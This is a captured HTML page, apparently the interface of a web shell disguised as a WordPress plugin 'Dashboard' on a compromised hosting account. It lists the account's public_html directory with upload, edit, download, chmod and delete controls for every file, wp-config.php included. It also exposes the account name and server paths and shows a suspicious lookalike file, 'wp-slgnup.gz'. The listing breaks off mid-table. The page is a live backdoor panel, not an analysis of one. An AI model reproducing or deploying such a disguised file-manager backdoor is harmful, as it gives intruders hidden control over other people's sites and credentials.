{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-09-14 22:06:32"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2">home2</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2%2Fpablod78">pablod78</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html">public_html</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
                        <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <table class="file-table">
                <thead><tr><th>Name</th><th>Size</th><th>Permissions</th><th>Modified</th><th>Actions</th></tr></thead>
                <tbody id="file-list">
                                            <tr><td colspan="5"><a href="?p=%2Fhome2%2Fpablod78" class="folder-link">📂 Parent Directory</a></td></tr>
                                                                <tr data-name="cgi-bin">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fcgi-bin" class="folder-link">📁 cgi-bin</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-06 19:01</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/cgi-bin','cgi-bin')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/cgi-bin','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/cgi-bin',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="paulo.medeiros">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fpaulo.medeiros" class="folder-link">📁 paulo.medeiros</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2025-09-09 23:32</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/paulo.medeiros','paulo.medeiros')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/paulo.medeiros','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/paulo.medeiros',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-admin">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-admin" class="folder-link">📁 wp-admin</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-07-07 02:04</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-admin','wp-admin')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-admin','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-admin',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-content">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-content" class="folder-link">📁 wp-content</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-20 10:18</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-content','wp-content')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-content','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-content',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-includes">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-includes" class="folder-link">📁 wp-includes</a></td>
                            <td class="size">-</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <button onclick="showRename('/home2/pablod78/public_html/wp-includes','wp-includes')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-includes','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-includes',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                                                <tr data-name="about.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="file-link">📄 about.php</a></td>
                            <td class="size">3.7 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 08:13</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fabout.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/about.php','about.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/about.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/about.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="default.html">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="file-link">📄 default.html</a></td>
                            <td class="size">246 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-12 23:18</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fdefault.html" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/default.html','default.html')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/default.html','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/default.html',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="error_log">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="file-link">📄 error_log</a></td>
                            <td class="size">24.1 MB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-09-13 09:54</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Ferror_log" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/error_log','error_log')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/error_log','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/error_log',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="index.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="file-link">📄 index.php</a></td>
                            <td class="size">405 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-06 19:50</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Findex.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/index.php','index.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/index.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/index.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="license.txt">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="file-link">📄 license.txt</a></td>
                            <td class="size">19.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Flicense.txt" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/license.txt','license.txt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/license.txt','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/license.txt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="readme.html">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="file-link">📄 readme.html</a></td>
                            <td class="size">7.2 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Freadme.html" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/readme.html','readme.html')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/readme.html','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/readme.html',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="robots.txt">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="file-link">📄 robots.txt</a></td>
                            <td class="size">108 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 09:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Frobots.txt" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/robots.txt','robots.txt')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/robots.txt','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/robots.txt',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-activate.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="file-link">📄 wp-activate.php</a></td>
                            <td class="size">7.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-activate.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-activate.php','wp-activate.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-activate.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-activate.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-blog-header.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="file-link">📄 wp-blog-header.php</a></td>
                            <td class="size">860 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 09:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-blog-header.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-blog-header.php','wp-blog-header.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-blog-header.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-blog-header.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-comments-post.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="file-link">📄 wp-comments-post.php</a></td>
                            <td class="size">2.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2023-06-14 17:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-comments-post.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-comments-post.php','wp-comments-post.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-comments-post.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-comments-post.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-config-sample.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="file-link">📄 wp-config-sample.php</a></td>
                            <td class="size">3.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config-sample.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-config-sample.php','wp-config-sample.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-config-sample.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-config-sample.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-config.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="file-link">📄 wp-config.php</a></td>
                            <td class="size">3.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-09 23:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-config.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-config.php','wp-config.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-config.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-config.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-cron.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="file-link">📄 wp-cron.php</a></td>
                            <td class="size">5.5 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-07-06 18:51</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-cron.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-cron.php','wp-cron.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-cron.php','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-cron.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-links-opml.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="file-link">📄 wp-links-opml.php</a></td>
                            <td class="size">2.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-links-opml.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-links-opml.php','wp-links-opml.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-links-opml.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-links-opml.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-load.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="file-link">📄 wp-load.php</a></td>
                            <td class="size">3.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-03-11 13:05</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-load.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-load.php','wp-load.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-load.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-load.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-login.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="file-link">📄 wp-login.php</a></td>
                            <td class="size">51.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-login.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-login.php','wp-login.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-login.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-login.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-mail.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="file-link">📄 wp-mail.php</a></td>
                            <td class="size">8.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-12-03 02:22</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-mail.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-mail.php','wp-mail.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-mail.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-mail.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-settings.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="file-link">📄 wp-settings.php</a></td>
                            <td class="size">32.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-settings.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-settings.php','wp-settings.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-settings.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-settings.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-signup.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="file-link">📄 wp-signup.php</a></td>
                            <td class="size">34.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-signup.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-signup.php','wp-signup.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-signup.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-signup.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-slgnup.gz">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="file-link">📄 wp-slgnup.gz</a></td>
                            <td class="size">2.8 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-07-18 05:53</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-slgnup.gz" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-slgnup.gz','wp-slgnup.gz')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-slgnup.gz','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-slgnup.gz',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wp-trackback.php">
                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="file-link">📄 wp-trackback.php</a></td>
                            <td class="size">5.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 02:23</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fwp-trackback.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/wp-trackback.php','wp-trackback.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/wp-trackback.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/wp-trackback.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="xmlrpc.php">
